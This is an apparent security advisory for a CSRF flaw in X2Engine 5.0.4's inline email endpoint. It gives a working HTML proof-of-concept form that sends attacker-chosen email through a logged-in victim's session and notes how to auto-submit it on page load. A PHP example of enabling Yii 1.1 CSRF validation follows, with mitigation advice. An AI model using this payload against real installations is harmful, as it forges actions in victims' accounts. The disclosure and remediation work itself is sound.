# Affected software: X2Engine
# Type of vulnerability: CSRF (no anti-CSRF token on the inline email action)
# URL: http://demo.x2engine.com
# Discovered by: Provensec
# Website: http://www.provensec.com

# Version: X2Engine 5.0.4 Platinum Edition
# Proof of concept

The inline email action (emailInboxes/inlineEmail) accepts a POST without any
anti-CSRF token, so a page under the attacker's control can submit the form
below while a victim is logged in to X2Engine. The browser attaches the
victim's session cookie and the application sends an email from the victim's
account, with recipient, subject and body chosen by the attacker.

<!-- CSRF proof of concept. Host this page anywhere and have a logged-in
     X2Engine user open it; pressing the button sends the email through the
     victim's session. No anti-CSRF token has to be supplied. -->
<html>
  <body>
    <form action="http://demo.x2engine.com/index.php/emailInboxes/inlineEmail?ajax=1&amp;postReplace=0&amp;contactFlag=1&amp;skipEvent=0"
          method="POST">
      <input type="hidden" name="InlineEmail[modelId]" value="" />
      <input type="hidden" name="associationType" value="EmailInboxes" />
      <input type="hidden" name="InlineEmail[modelName]" value="" />
      <input type="hidden" name="contactFlag" value="1" />
      <!-- credId selects the victim's configured outbound mail credential -->
      <input type="hidden" name="InlineEmail[credId]" value="1" />
      <input type="hidden" name="InlineEmail[to]" value="test@tes" />
      <input type="hidden" name="InlineEmail[cc]" value="" />
      <input type="hidden" name="InlineEmail[bcc]" value="" />
      <input type="hidden" name="InlineEmail[subject]" value="test@tes" />
      <input type="hidden" name="InlineEmail[message]" value="test@tes" />
      <!-- Yii checkbox convention: a hidden 0 followed by the checked value 1;
           PHP keeps the last value for a repeated parameter name -->
      <input type="hidden" name="InlineEmail[emailInboxesEmailSync]" value="0" />
      <input type="hidden" name="InlineEmail[emailInboxesEmailSync]" value="1" />
      <!-- to fire the request without user interaction, replace the button
           with a script that calls document.forms[0].submit() on load -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
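The missing control, as an added example that is not X2Engine's or Yii's own code. X2Engine is built on Yii 1.1, whose request component ships with CSRF validation switched off; the component and property names below (enableCsrfValidation, csrfTokenName, csrfCookie, YII_CSRF_TOKEN) are Yii 1.1's real ones. The config file path protected/config/main.php is an assumption about X2Engine's layout, and csrf_request_allowed() is a stand-alone restatement of the check that setting enables, written here so the logic can be read and run from the command line without the framework. The request bodies are constructed from the PoC's parameter names (kept flat here; PHP itself would nest them under InlineEmail).

```php
<?php
// Added example, not X2Engine or Yii code.
// Part 1: the configuration that turns on Yii 1.1's CSRF check. Component and
// property names are Yii 1.1's; the file it belongs in
// (protected/config/main.php) is an assumption about X2Engine's layout.
$configFragment = [
    'components' => [
        'request' => [
            'enableCsrfValidation' => true,              // reject POSTs that lack a valid token
            'csrfTokenName'        => 'YII_CSRF_TOKEN',  // Yii 1.1 default name
            'csrfCookie'           => ['httpOnly' => true],
        ],
    ],
];

// Part 2: the check that setting enables, restated without the framework.
// Yii 1.1 uses a double-submit cookie: the token lives in a cookie the browser
// sends automatically, and CHtml::beginForm() copies it into a hidden field of
// every POST form. A cross-site page makes the browser send the cookie but
// cannot read it, so it cannot supply the matching POST parameter.
function csrf_request_allowed(string $method, array $cookies, array $post,
                              string $tokenName = 'YII_CSRF_TOKEN'): bool
{
    if (strcasecmp($method, 'POST') !== 0) {
        return true; // only state-changing requests are checked
    }
    if (!isset($cookies[$tokenName], $post[$tokenName])) {
        return false; // the advisory's PoC ends here: no token in the body at all
    }
    // constant-time comparison; never compare secrets with ==
    return hash_equals((string) $cookies[$tokenName], (string) $post[$tokenName]);
}

// Part 3: replay the PoC's parameters against a victim whose browser holds a
// token cookie, then an attacker's guessed token, then the request as the
// application's own form would send it. All values are constructed here.
$victimCookies = ['YII_CSRF_TOKEN' => bin2hex(random_bytes(16))];
$pocPost = [
    'InlineEmail[credId]'  => '1',
    'InlineEmail[to]'      => 'test@tes',
    'InlineEmail[subject]' => 'test@tes',
    'InlineEmail[message]' => 'test@tes',
];
$forgedPost = $pocPost + ['YII_CSRF_TOKEN' => bin2hex(random_bytes(16))];
$legitPost  = $pocPost + ['YII_CSRF_TOKEN' => $victimCookies['YII_CSRF_TOKEN']];

$cases = [
    'PoC (no token)'                       => $pocPost,
    'attacker-guessed token'               => $forgedPost,
    'application form (token from cookie)' => $legitPost,
];
foreach ($cases as $label => $body) {
    printf("%-40s allowed=%s\n", $label,
        var_export(csrf_request_allowed('POST', $victimCookies, $body), true));
}
```

Run it with `php csrf_check.php`. Two caveats when enabling this on a real X2Engine install: enableCsrfValidation is global in Yii 1.1, so every POST form in the application must carry the hidden field (CHtml::beginForm() adds it; hand-written forms do not), and because inlineEmail is called with ajax=1, any JavaScript that assembles that POST itself must append YII_CSRF_TOKEN, which the server can expose at render time through Yii::app()->request->csrfToken. Setting SameSite=Lax on the session cookie and rejecting POSTs whose Origin header is not the application's own host are worthwhile defence in depth but are not substitutes for the token.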